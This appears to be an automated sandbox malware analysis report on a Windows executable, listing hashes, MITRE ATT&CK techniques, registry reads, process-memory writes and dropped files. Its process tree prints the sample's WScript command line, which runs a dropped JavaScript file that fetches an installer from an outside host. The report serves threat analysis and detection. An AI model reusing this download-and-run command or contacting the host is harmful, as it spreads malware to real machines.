54e8baa16d86951d2dfa204890a4091c146edb71b6659c434f2dc39c64e35a37

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
07-09-2024 07:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe
Size

184KB
MD5

d17143159e1eb442d7a78b7137eb0059
SHA1

424062d5873445c5027ec50922e119db6d65d6aa
SHA256

54e8baa16d86951d2dfa204890a4091c146edb71b6659c434f2dc39c64e35a37
SHA512

0b24863952a4f1d062a1c091a92cf5062a2a042dfddc7118314962c85b90bebb5144a2389dfd3844f4ef549b12e37d364eef81492fd25055d4f38f8fdc06e50f
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3Q:/7BSH8zUB+nGESaaRvoB7FJNndnx

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2776	WScript.exe
8	2776	WScript.exe
10	2776	WScript.exe
12	2592	WScript.exe
13	2592	WScript.exe
15	1612	WScript.exe
16	1612	WScript.exe
18	1160	WScript.exe
19	1160	WScript.exe
21	2376	WScript.exe
22	2376	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2696 wrote to memory of 2776	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	30
PID 2696 wrote to memory of 2776	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	30
PID 2696 wrote to memory of 2776	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	30
PID 2696 wrote to memory of 2776	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	30
PID 2696 wrote to memory of 2592	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	32
PID 2696 wrote to memory of 2592	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	32
PID 2696 wrote to memory of 2592	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	32
PID 2696 wrote to memory of 2592	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	32
PID 2696 wrote to memory of 1612	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	34
PID 2696 wrote to memory of 1612	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	34
PID 2696 wrote to memory of 1612	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	34
PID 2696 wrote to memory of 1612	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	34
PID 2696 wrote to memory of 1160	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	36
PID 2696 wrote to memory of 1160	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	36
PID 2696 wrote to memory of 1160	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	36
PID 2696 wrote to memory of 1160	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	36
PID 2696 wrote to memory of 2376	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	38
PID 2696 wrote to memory of 2376	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	38
PID 2696 wrote to memory of 2376	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	38
PID 2696 wrote to memory of 2376	2696	d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\d17143159e1eb442d7a78b7137eb0059_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2696
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufEB78.js" http://www.djapp.info/?domain=zaBqVTzIbr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufEB78.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2776
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufEB78.js" http://www.djapp.info/?domain=zaBqVTzIbr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufEB78.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2592
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufEB78.js" http://www.djapp.info/?domain=zaBqVTzIbr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufEB78.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1612
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufEB78.js" http://www.djapp.info/?domain=zaBqVTzIbr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufEB78.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1160
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufEB78.js" http://www.djapp.info/?domain=zaBqVTzIbr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufEB78.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2376

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
3fd3c9f7a66eb0f2f0e5418664ed67db

SHA1
bcca8ccd4fb5334d88ae1f70398456344d204d39

SHA256
6b8f50070f2cb2ac5957455f76923a18e5636c94cfeff4d01c8c2ea92e84fdfc

SHA512
b8133f3071fdc4ddd3b4d888b02ef95a451268b2ea97446ed3f05a3fd4085ed8c6344baba865ed85d75f5fe88cf305e331722ee35320a6b2f845d2387ffaf1f0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
624c63db0dc7101b7ddf538164339fee

SHA1
8a1d35d1557e3b05f0c405418608b9b947aa368a

SHA256
f83ed0a3a135abfb065a0a4247218b51dbc0b5c9e34bab8ff915d6a777d674fb

SHA512
dd770dbb43106f8d2a72baf69ec9632b8d5c76462368bde0a67353f9e9c8372f83b8c3787250d4173044d73a47aab342d29bc0bb4f5547b3de38bbd7b91faefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
cb63321403cf9bc7c3ded5fa55a3eea1

SHA1
eeb96360e62287f57f3d2dec6f0d0585003135ac

SHA256
4c51537a3e4d2e6536c5e784080d4e1d0f6f5b13b81c97eec41102ffff00a465

SHA512
fa3ce42cd66c24a1b45ebea8703e32c182a25e198330880f23a4404d51b06afb51031be73b1871592343a8b57dc7f24e01503dcbba40b5d3165aba0076007c98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm

Filesize
6KB

MD5
35e3718f7b4fe06814cbc77777bbaea0

SHA1
55e9641f6a150530dd60ccc4283ce0b6890ec8cb

SHA256
1b72f32c9923739e9f6bc86ef217bdd78b160a1495231f9154f785ce78483cc5

SHA512
571498945628d0dc1cd0886fc8fdfd353d543e8f9d32453319c3af8733a772f7c28828e2a90bcc4395b95a83038052b39a9254209f248562887234923ad43ac3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm

Filesize
6KB

MD5
8767ef7d515ef290a1ded32efa564b92

SHA1
338ceb5de0f56bbd2e9ee8b92bf26eeef29d634b

SHA256
a6ae33116c7b879b83125bb678127025d20281080b1653ddc666d08f7b78c370

SHA512
2de4a8bddf2d2e32c96d9df0697b2128bb4a122f04d5346fe705f3e6982bfb8b800bc8cd5d44e43a9994d8dff77a0bcea91ac31f5c98b1a26e4b5d33c4bc8876

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S8GI6B9B\domain_profile[1].htm

Filesize
6KB

MD5
02aea8d19203cc76f9248d2fc5e1f3bc

SHA1
3ad6f251c2a10f277378056cf02547794f720878

SHA256
a61203ecf68c67918f208a62fe858b6aa6b82293f848c50586574f7c6e3e8d77

SHA512
f8e360c8deafb709f6e106210dc3574b15d514669b896684fc41e45ccd4da4a632769c6f7c1605c4634c6e6a59375e388e524d2722b620bc88d09c513bb7b8af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S8GI6B9B\domain_profile[1].htm

Filesize
40KB

MD5
4244398a7a5ce83f8f01fa3f60a8fed5

SHA1
38050be81272ecba47596444ce5d37618e095084

SHA256
62bb3933912ce37c1eaed18188047daf419e649bc938c078e92348e6289e1a1d

SHA512
7cafa2b3f58ca01c26372aba205ff866cc03f04626dc6b417879d24002b836df1e8d820939ca56313f5254f4c28f5170af8da7ee3f674bf3ae3ccae50dbab566

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab1BCA.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar342B.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufEB78.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\LE7JSQE8.txt

Filesize
177B

MD5
52f33ede80b3057d69c28591a84d8f52

SHA1
0d628083ce63f935ff7377d39238e1dcd78ff1d1

SHA256
16e122049d1b739bc7604f0d05a54a992681cf33545d4dce1db061b1c32e69fb

SHA512
abb2f86fb21feb54e46bedea8271f3da7f5380136c9f28621c11eb1a7e3675c4697a968d3fc3e330784b42a68aed56b4a62312362c77acb37ecf8575fa2b55a2

Download Submit